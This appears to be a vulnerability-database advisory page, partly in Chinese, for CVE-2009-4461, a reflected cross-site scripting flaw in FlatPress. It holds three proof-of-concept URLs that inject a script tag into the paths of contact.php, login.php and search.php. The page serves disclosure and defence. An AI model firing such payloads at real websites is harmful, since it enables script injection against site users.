CVE-2009-4461,CNNVD-200912-400|FlatPress Cross Site Scripting Vulnerability

FlatPress Cross Site Scripting Vulnerability CVE-2009-4461 CNNVD-200912-400

4.3 AV AC AU C I A

发布： 2009-12-30

修订： 2009-12-30

CWE-79

#### 1. 漏洞成因在contact.php、login.php、search.php页面中对输入的转义处理不恰当 #### 2.漏洞验证 ``` http://server/flatpress/contact.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/login.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/search.php/>"><ScRiPt>alert(test)</ScRiPt> ```

漏洞利用/PoC

当前有2条漏洞利用/PoC

受影响的平台与产品

当前有1条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™

FlatPress Cross Site Scripting Vulnerability CVE-2009-4461 CNNVD-200912-400

漏洞利用/PoC

受影响的平台与产品

贡献用户

相关漏洞清单